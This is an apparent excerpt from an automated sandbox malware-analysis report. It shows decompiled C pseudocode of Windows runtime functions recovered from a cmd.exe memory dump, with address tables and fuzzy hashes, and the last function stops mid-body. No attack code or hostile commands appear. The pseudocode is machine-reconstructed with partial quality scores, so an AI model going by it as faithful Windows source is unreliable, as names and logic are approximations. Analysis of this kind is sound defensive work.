                                                                                                                                          0x03c13d8e
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4e7a4
                                                                                                                                          0x03c13d96
                                                                                                                                          0x03c13d9a
                                                                                                                                          0x00000000
                                                                                                                                          0x03c13d9a
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4e794
                                                                                                                                          0x03c13d6e
                                                                                                                                          0x03c13d73
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4e7b5
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 156fb3239fd89c4e0524dfaf97bd631eb0bac70c227eab4545f8fce8e80d8d70
                                                                                                                                          • Instruction ID: bc8d0d6d218e879ffed2d3a80ed5621ea08409a8160e882b0acfb817a061bcd3
                                                                                                                                          • Opcode Fuzzy Hash: 156fb3239fd89c4e0524dfaf97bd631eb0bac70c227eab4545f8fce8e80d8d70
                                                                                                                                          • Instruction Fuzzy Hash: 7D31AD39A10654DBC734DF2AC841A7ABBA9EF46718B0980AAE845CF350E730D951E790
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BFC182 Relevance: .1, Instructions: 104COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                          			E03BFC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E03BF7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E03CA8D34(_v8, _t80);
					}
					E03BF2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E03BEFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E03CA8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E03BEFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E03C1B180();
						if(_a4 != 0) {
							E03BF2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E03BFBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E03BFBB2D(_t16, _t15);
						E03BFB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E03BEFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E03BEFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E03BEFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                                                                                                          0x03bfc18d
                                                                                                                                          0x03bfc18f
                                                                                                                                          0x03bfc191
                                                                                                                                          0x03bfc19b
                                                                                                                                          0x03bfc1a0
                                                                                                                                          0x03bfc1d4
                                                                                                                                          0x03bfc1de
                                                                                                                                          0x03c42d6e
                                                                                                                                          0x03bfc1e4
                                                                                                                                          0x03bfc1e4
                                                                                                                                          0x03bfc1e4
                                                                                                                                          0x03bfc1ec
                                                                                                                                          0x03c42d7d
                                                                                                                                          0x03c42d7d
                                                                                                                                          0x03bfc1f3
                                                                                                                                          0x03bfc1ff
                                                                                                                                          0x03c42d88
                                                                                                                                          0x03c42d8d
                                                                                                                                          0x03c42d94
                                                                                                                                          0x03c42d94
                                                                                                                                          0x03c42d9f
                                                                                                                                          0x03c42da4
                                                                                                                                          0x03c42dab
                                                                                                                                          0x03c42db0
                                                                                                                                          0x03c42db2
                                                                                                                                          0x03c42db3
                                                                                                                                          0x03c42db4
                                                                                                                                          0x03c42dbc
                                                                                                                                          0x03c42dc3
                                                                                                                                          0x03c42dc3
                                                                                                                                          0x03bfc205
                                                                                                                                          0x03bfc205
                                                                                                                                          0x03bfc208
                                                                                                                                          0x03bfc20e
                                                                                                                                          0x03bfc211
                                                                                                                                          0x03bfc216
                                                                                                                                          0x03bfc219
                                                                                                                                          0x03bfc21f
                                                                                                                                          0x03bfc222
                                                                                                                                          0x03bfc22c
                                                                                                                                          0x03bfc234
                                                                                                                                          0x03bfc23a
                                                                                                                                          0x03bfc23f
                                                                                                                                          0x03bfc245
                                                                                                                                          0x03bfc24b
                                                                                                                                          0x03bfc251
                                                                                                                                          0x03bfc25a
                                                                                                                                          0x03bfc276
                                                                                                                                          0x03bfc27d
                                                                                                                                          0x03bfc27d
                                                                                                                                          0x03bfc25c
                                                                                                                                          0x03bfc25c
                                                                                                                                          0x00000000
                                                                                                                                          0x03bfc25e
                                                                                                                                          0x03bfc1a4
                                                                                                                                          0x03bfc1aa
                                                                                                                                          0x03bfc1b3
                                                                                                                                          0x03bfc265
                                                                                                                                          0x03bfc26c
                                                                                                                                          0x03bfc26c
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                                                          • Instruction ID: b9a9dd2ada15f1ecaae38146b958dbeae35a9e35e3add1fdd19b640284ac8e49
                                                                                                                                          • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                                                          • Instruction Fuzzy Hash: 6B312A75B0164AAED704EBB4C480BE9FB54FF42248F0851FAD5188F201DB349A5DD7E0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C57016 Relevance: .1, Instructions: 104COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                          			E03C57016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x3ccd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E03C56B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E03C56B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E03BF7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E03C19AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E03C1B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L03BF4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                                                                                                          0x03c57016
                                                                                                                                          0x03c5701e
                                                                                                                                          0x03c5702b
                                                                                                                                          0x03c57033
                                                                                                                                          0x03c57037
                                                                                                                                          0x03c5703c
                                                                                                                                          0x03c5703e
                                                                                                                                          0x03c57041
                                                                                                                                          0x03c57045
                                                                                                                                          0x03c5704a
                                                                                                                                          0x03c57050
                                                                                                                                          0x03c57055
                                                                                                                                          0x03c5705a
                                                                                                                                          0x03c57062
                                                                                                                                          0x03c57062
                                                                                                                                          0x03c5705a
                                                                                                                                          0x03c57064
                                                                                                                                          0x03c57064
                                                                                                                                          0x03c57067
                                                                                                                                          0x03c57071
                                                                                                                                          0x03c57096
                                                                                                                                          0x03c5709b
                                                                                                                                          0x03c570a2
                                                                                                                                          0x03c570a6
                                                                                                                                          0x03c570a7
                                                                                                                                          0x03c570ad
                                                                                                                                          0x03c570b3
                                                                                                                                          0x03c570b6
                                                                                                                                          0x03c570bb
                                                                                                                                          0x03c570c3
                                                                                                                                          0x03c570c3
                                                                                                                                          0x03c570c6
                                                                                                                                          0x03c570cd
                                                                                                                                          0x03c570dd
                                                                                                                                          0x03c570e0
                                                                                                                                          0x03c570e2
                                                                                                                                          0x03c570e2
                                                                                                                                          0x03c570ee
                                                                                                                                          0x03c57101
                                                                                                                                          0x03c570f0
                                                                                                                                          0x03c570f9
                                                                                                                                          0x03c570f9
                                                                                                                                          0x03c5710a
                                                                                                                                          0x03c5710e
                                                                                                                                          0x03c57112
                                                                                                                                          0x03c57117
                                                                                                                                          0x03c57118
                                                                                                                                          0x03c57118
                                                                                                                                          0x03c570bb
                                                                                                                                          0x03c5711d
                                                                                                                                          0x03c57123
                                                                                                                                          0x03c57131
                                                                                                                                          0x03c57131
                                                                                                                                          0x03c57136
                                                                                                                                          0x03c5713d
                                                                                                                                          0x03c5713e
                                                                                                                                          0x03c5713f
                                                                                                                                          0x03c5714a
                                                                                                                                          0x03c5714a
                                                                                                                                          0x03c57084
                                                                                                                                          0x03c57088
                                                                                                                                          0x00000000
                                                                                                                                          0x03c5708e
                                                                                                                                          0x03c5708e
                                                                                                                                          0x03c57092
                                                                                                                                          0x00000000
                                                                                                                                          0x03c57092

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: c6eba0b22badb381167ca333197fc0abc4d3f0a590016ed3ad157a1206d87da9
                                                                                                                                          • Instruction ID: 591f3c38ef22398db9961212d65f61fdc34bc09acbe3df11f10c51873b8167df
                                                                                                                                          • Opcode Fuzzy Hash: c6eba0b22badb381167ca333197fc0abc4d3f0a590016ed3ad157a1206d87da9
                                                                                                                                          • Instruction Fuzzy Hash: AA31B3766047519FC320DF28C840A6BB3E5BFC8700F094A29FC99CB690E731EA54D7A9
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C0A70E Relevance: .1, Instructions: 96COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                          			E03C0A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x3cc7b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x3cc7b10 = 8;
					 *0x3cc7b14 = 0x3cc7b0c;
					 *0x3cc7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E03C0A990(0x3cc7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L03C0A840(__edx, __ecx, __ecx, _t52, 0x3cc7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x3cc7b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x3cc7b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x3cc7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L03BF4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x3cc7b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E03C1F3E0(_t50,  *0x3cc7b14, _t8 >> 3);
						_t28 =  *0x3cc7b14; // 0x77577b0c
						__eflags = _t28 - 0x3cc7b0c;
						if(_t28 != 0x3cc7b0c) {
							L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x3cc7b14 = _t50;
						_t48 = _v12;
						 *0x3cc7b10 = _t9;
						goto L6;
					}
					 *0x3cc7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                                                                                                          0x03c0a713
                                                                                                                                          0x03c0a714
                                                                                                                                          0x03c0a717
                                                                                                                                          0x03c0a71d
                                                                                                                                          0x03c0a720
                                                                                                                                          0x03c0a722
                                                                                                                                          0x03c0a727
                                                                                                                                          0x03c0a74a
                                                                                                                                          0x03c0a754
                                                                                                                                          0x03c0a75e
                                                                                                                                          0x03c0a768
                                                                                                                                          0x03c0a76a
                                                                                                                                          0x03c0a773
                                                                                                                                          0x03c0a78b
                                                                                                                                          0x03c0a790
                                                                                                                                          0x03c0a792
                                                                                                                                          0x03c0a741
                                                                                                                                          0x03c0a741
                                                                                                                                          0x03c0a743
                                                                                                                                          0x03c0a749
                                                                                                                                          0x03c0a749
                                                                                                                                          0x03c0a732
                                                                                                                                          0x03c0a73a
                                                                                                                                          0x03c0a797
                                                                                                                                          0x03c0a79d
                                                                                                                                          0x03c0a7a3
                                                                                                                                          0x03c0a7a9
                                                                                                                                          0x03c0a7b6
                                                                                                                                          0x03c0a7bc
                                                                                                                                          0x03c0a7ca
                                                                                                                                          0x03c0a7e0
                                                                                                                                          0x03c0a7e2
                                                                                                                                          0x03c0a7e4
                                                                                                                                          0x03c49bf2
                                                                                                                                          0x00000000
                                                                                                                                          0x03c49bf2
                                                                                                                                          0x03c0a7ed
                                                                                                                                          0x03c0a7f2
                                                                                                                                          0x03c0a800
                                                                                                                                          0x03c0a805
                                                                                                                                          0x03c0a80d
                                                                                                                                          0x03c0a812
                                                                                                                                          0x03c49c08
                                                                                                                                          0x03c49c08
                                                                                                                                          0x03c0a818
                                                                                                                                          0x03c0a81b
                                                                                                                                          0x03c0a821
                                                                                                                                          0x03c0a824
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0a824
                                                                                                                                          0x03c0a7ae
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0a7ae
                                                                                                                                          0x03c0a73c
                                                                                                                                          0x03c0a73e
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 428ea3a92db9549e636e212d628b8e38a0b6e453748a328bb706534064a27832
                                                                                                                                          • Instruction ID: 3d9579f7fe37602af632b3098a95ef04f2a53716ec2499a166ac545d6d699d9c
                                                                                                                                          • Opcode Fuzzy Hash: 428ea3a92db9549e636e212d628b8e38a0b6e453748a328bb706534064a27832
                                                                                                                                          • Instruction Fuzzy Hash: 8031B1B9620344AFC711DF18D8A0F6AB7F9FB85710F1549AAE115CB284DB70AE01DF91
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BDAA16 Relevance: .1, Instructions: 93COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                          			E03BDAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x3ccd360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x3cc7b9c; // 0x0
					_t53 = L03BF4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E03C1B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E03C1F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L03BE6C59(_t53, _t51, _t58) != 0) {
							_t28 = E03C05E50(0x3bbc338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E03C0B230(_v32, _v28, 0x3bbc2d8, 1,  &_v24);
								_t28 = E03BDF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                                                                                                          0x03bdaa25
                                                                                                                                          0x03bdaa29
                                                                                                                                          0x03bdaa2d
                                                                                                                                          0x03bdaa30
                                                                                                                                          0x03bdaa37
                                                                                                                                          0x03bdaa3c
                                                                                                                                          0x03c34458
                                                                                                                                          0x03c34458
                                                                                                                                          0x03c34472
                                                                                                                                          0x03c34474
                                                                                                                                          0x03c34476
                                                                                                                                          0x03bdaa64
                                                                                                                                          0x03bdaa74
                                                                                                                                          0x03c3447c
                                                                                                                                          0x03c34483
                                                                                                                                          0x03c34492
                                                                                                                                          0x03bdaa52
                                                                                                                                          0x03bdaa54
                                                                                                                                          0x03bdaa5e
                                                                                                                                          0x03c344a8
                                                                                                                                          0x03c344ad
                                                                                                                                          0x03c344af
                                                                                                                                          0x03c344b6
                                                                                                                                          0x03c344b6
                                                                                                                                          0x03c344b9
                                                                                                                                          0x03c344bc
                                                                                                                                          0x03c344cd
                                                                                                                                          0x03c344d3
                                                                                                                                          0x03c344d6
                                                                                                                                          0x03c344e1
                                                                                                                                          0x03c344e1
                                                                                                                                          0x03c344e6
                                                                                                                                          0x03c344e8
                                                                                                                                          0x03c344fb
                                                                                                                                          0x03c344fb
                                                                                                                                          0x03c344e8
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdaa5e
                                                                                                                                          0x03c34476
                                                                                                                                          0x03bdaa42
                                                                                                                                          0x03bdaa46
                                                                                                                                          0x03bdaa48
                                                                                                                                          0x03bdaa4c
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 224e43bb3209f268ff234f7284dde4c83d7657f74bec48d8f957c1bf978e4c38
                                                                                                                                          • Instruction ID: c468748a6a1c26ab9cebbdabebde525c1973342b813d9844f0d7f3cd72a720b1
                                                                                                                                          • Opcode Fuzzy Hash: 224e43bb3209f268ff234f7284dde4c83d7657f74bec48d8f957c1bf978e4c38
                                                                                                                                          • Instruction Fuzzy Hash: 1D31AE71A00619ABCB14EF65C981ABFB7B8EF04704F0540B9F901EB250EB74AE11DBA1
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C061A0 Relevance: .1, Instructions: 93COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                          			E03C061A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E03C05E50(0x3bb67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E03CA9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E03BDF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                                                                                                          0x03c061b3
                                                                                                                                          0x03c061b5
                                                                                                                                          0x03c061bd
                                                                                                                                          0x03c061c3
                                                                                                                                          0x03c061c7
                                                                                                                                          0x03c061d2
                                                                                                                                          0x03c061ff
                                                                                                                                          0x03c061ff
                                                                                                                                          0x03c06201
                                                                                                                                          0x03c06207
                                                                                                                                          0x03c06207
                                                                                                                                          0x03c061d4
                                                                                                                                          0x03c061d9
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c061df
                                                                                                                                          0x03c061e2
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c061e6
                                                                                                                                          0x03c061e8
                                                                                                                                          0x03c061ee
                                                                                                                                          0x03c061ee
                                                                                                                                          0x03c061f9
                                                                                                                                          0x03c4762f
                                                                                                                                          0x03c47632
                                                                                                                                          0x03c47635
                                                                                                                                          0x03c47639
                                                                                                                                          0x03c47640
                                                                                                                                          0x03c4766e
                                                                                                                                          0x03c47675
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47681
                                                                                                                                          0x03c47689
                                                                                                                                          0x03c4768d
                                                                                                                                          0x03c47691
                                                                                                                                          0x03c47695
                                                                                                                                          0x03c47699
                                                                                                                                          0x03c476af
                                                                                                                                          0x03c476b5
                                                                                                                                          0x03c476b7
                                                                                                                                          0x03c476b7
                                                                                                                                          0x03c476d7
                                                                                                                                          0x03c476dc
                                                                                                                                          0x00000000
                                                                                                                                          0x03c476dc
                                                                                                                                          0x03c476a2
                                                                                                                                          0x03c476a9
                                                                                                                                          0x03c47651
                                                                                                                                          0x03c47653
                                                                                                                                          0x03c47653
                                                                                                                                          0x03c47656
                                                                                                                                          0x03c47656
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47656
                                                                                                                                          0x03c47644
                                                                                                                                          0x03c47646
                                                                                                                                          0x03c47648
                                                                                                                                          0x03c47648
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: cc054193c8ecf6dd9cd6915bf7049ae81d7a1e2a2efe1b0a282941c4af16da1c
                                                                                                                                          • Instruction ID: a833e2a11fd5f62676aee5488370ee263811626d24c0c5da0f61f0853d65ecf4
                                                                                                                                          • Opcode Fuzzy Hash: cc054193c8ecf6dd9cd6915bf7049ae81d7a1e2a2efe1b0a282941c4af16da1c
                                                                                                                                          • Instruction Fuzzy Hash: D9318D716097518FD320CF19C800B6AF7E5FB88B10F09496DE8A8DB391E7B1E914CB91
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C14A2C Relevance: .1, Instructions: 92COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                          			E03C14A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x3ccd360 ^ _t62;
